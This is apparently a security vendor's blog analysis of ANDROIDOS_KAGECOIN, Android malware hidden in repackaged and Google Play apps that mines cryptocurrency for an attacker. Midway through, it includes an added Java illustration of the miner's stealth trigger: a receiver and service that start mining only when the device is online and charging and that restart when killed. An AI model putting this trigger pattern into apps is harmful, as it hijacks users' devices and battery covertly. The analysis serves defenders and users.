Recently, other researchers reported that a new Android malware family (detected as ANDROIDOS_KAGECOIN.HBT) had cryptocurrency mining capabilities. Based on our analysis, we have found that this malware is involved in mining several digital currencies, including Bitcoin, Litecoin, and Dogecoin. This has real consequences for users: shorter battery life and increased wear and tear, both of which can lead to a shorter device lifespan.
The researchers originally found ANDROIDOS_KAGECOIN as repackaged copies of popular apps such as Football Manager Handheld and TuneIn Radio. The apps were injected with the CPU mining code from a legitimate Android cryptocurrency mining app; that code is based on the well-known cpuminer software.
To hide the malicious code, the cybercriminal modified the Google Mobile Ads portion of the app, as seen below:
Figure 1. The modified Google Mobile Ads code
The miner is started as a background service once it detects that the affected device is connected to the Internet. By default, it launches the CPU miner to connect to a dynamic domain, which then redirects to an anonymous Dogecoin mining pool.
By February 17, his network of mobile miners had earned him thousands of Dogecoins. After February 17, the cybercriminal switched mining pools. The malware is configured to download a file which contains the information necessary to update the configuration of the miner. This configuration file was updated, and the miner now connects to the well-known WafflePool mining pool. The Bitcoins mined have been paid out (i.e., transferred to the cybercriminal's wallet) several times.
Figure 2. Coin pool configuration code
The coin-mining apps discussed above were found outside of the Google Play store, but we have found the same behavior in apps inside the Google Play store. These apps have been downloaded by millions of users, which means that there may be many Android devices out there being used to mine cryptocurrency for cybercriminals. We detect this new malware family as ANDROIDOS_KAGECOIN.HBTB. (As of this writing, these apps are still available.)
Figure 3. Mining apps in Google Play
Figure 4. Download count of mining apps
Analyzing the code of these apps reveals the cryptocurrency mining code inside. Unlike the other malicious apps, in these cases the mining only occurs while the device is charging, so that the increased energy usage is less likely to be noticed.
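To make the two start conditions concrete (the repackaged apps start the miner as soon as the device is online; the Google Play variants additionally wait until the device is charging), here is an added illustration written against the public Android API. It is not code from the KAGECOIN samples or from Trend Micro: `MiningTrigger`, `MinerService`, its native entry point and the pool URL are hypothetical placeholders standing in for the cpuminer-derived code in the real apps.

```java
// Added example (not code from the KAGECOIN samples or from Trend Micro): the
// two start conditions described in the post, written against the public
// Android API. MinerService, nativeMine and POOL_URL are hypothetical
// placeholders for the cpuminer-derived code in the real apps.
import android.app.Service;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.os.BatteryManager;
import android.os.IBinder;

public class MiningTrigger extends BroadcastReceiver {
    // false: repackaged apps, which mine whenever the device is online.
    // true : Google Play variants, which additionally wait for the charger.
    static final boolean REQUIRE_CHARGING = true;

    static boolean isOnline(Context ctx) {
        ConnectivityManager cm =
                (ConnectivityManager) ctx.getSystemService(Context.CONNECTIVITY_SERVICE);
        NetworkInfo ni = cm.getActiveNetworkInfo();
        return ni != null && ni.isConnected();
    }

    static boolean isCharging(Context ctx) {
        // ACTION_BATTERY_CHANGED is a sticky broadcast, so registering a null
        // receiver returns the most recent battery state immediately.
        Intent battery = ctx.registerReceiver(null,
                new IntentFilter(Intent.ACTION_BATTERY_CHANGED));
        if (battery == null) return false;
        int status = battery.getIntExtra(BatteryManager.EXTRA_STATUS, -1);
        return status == BatteryManager.BATTERY_STATUS_CHARGING
                || status == BatteryManager.BATTERY_STATUS_FULL;
    }

    @Override
    public void onReceive(Context ctx, Intent intent) {
        // Registered in the manifest for CONNECTIVITY_ACTION,
        // ACTION_POWER_CONNECTED and ACTION_POWER_DISCONNECTED, so every
        // change in either condition re-evaluates whether to mine.
        boolean mine = isOnline(ctx) && (!REQUIRE_CHARGING || isCharging(ctx));
        Intent svc = new Intent(ctx, MinerService.class);
        if (mine) {
            ctx.startService(svc);
        } else {
            ctx.stopService(svc); // Play variants go quiet once unplugged
        }
    }
}

// Background service wrapping the miner. In the real samples this is where the
// cpuminer-derived code runs; here the JNI entry point is only declared.
class MinerService extends Service {
    // Hypothetical pool endpoint; the samples fetched theirs from a remote config.
    static final String POOL_URL = "stratum+tcp://pool.example.invalid:3333";
    private Thread worker;

    // Assumed native method implemented by a bundled cpuminer build.
    private static native void nativeMine(String poolUrl);

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        if (worker == null) {
            worker = new Thread(new Runnable() {
                @Override public void run() { nativeMine(POOL_URL); }
            });
            worker.start();
        }
        return START_STICKY; // the system restarts the service if it is killed
    }

    @Override
    public void onDestroy() {
        // Best effort only: a native mining loop needs its own stop flag.
        if (worker != null) worker.interrupt();
        worker = null;
    }

    @Override
    public IBinder onBind(Intent intent) { return null; }
}
```

For this to fire, the manifest has to declare the receiver with intent filters for `android.net.conn.CONNECTIVITY_CHANGE`, `android.intent.action.ACTION_POWER_CONNECTED` and `android.intent.action.ACTION_POWER_DISCONNECTED`, declare the service, and request the `INTERNET` and `ACCESS_NETWORK_STATE` permissions; none of those are unusual for an ad-supported app, which is why the trojanized apps did not stand out on permissions alone. The practical consequence of the charging gate is that the symptom to look for on the Play variants is a slow, hot charge rather than rapid battery drain while unplugged.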
Figure 5. Cryptocurrency mining code
The same miner configuration updating logic is also present here. Analyzing the configuration file, it appears that the cybercriminal responsible is switching to mining Litecoins.
Figure 6. Configuration file, showing the switch to Litecoin mining
We believe that with thousands of affected devices, the cybercriminal has accumulated a good deal of Dogecoins.
Reading the app descriptions and the terms and conditions on the websites of these apps, users may not realize that their devices could be used for mining, because of the obscure language and vague terminology.
Clever as the attack is, whoever carried it out may not have thought things through. Phones do not have sufficient performance to serve as effective miners. Users will also quickly notice the odd behavior of the miners: slow charging and excessively hot phones are easily seen, making the miner's presence not particularly stealthy. Yes, the attacker can make money this way, but at a glacial pace.
Users with phones and tablets that are suddenly charging slowly, running hot, or quickly running out of battery may want to consider whether they have been exposed to this or similar threats. Also, just because an app has been downloaded from an app store, even Google Play, does not mean it is safe.
We have informed the Google Play security team about this issue.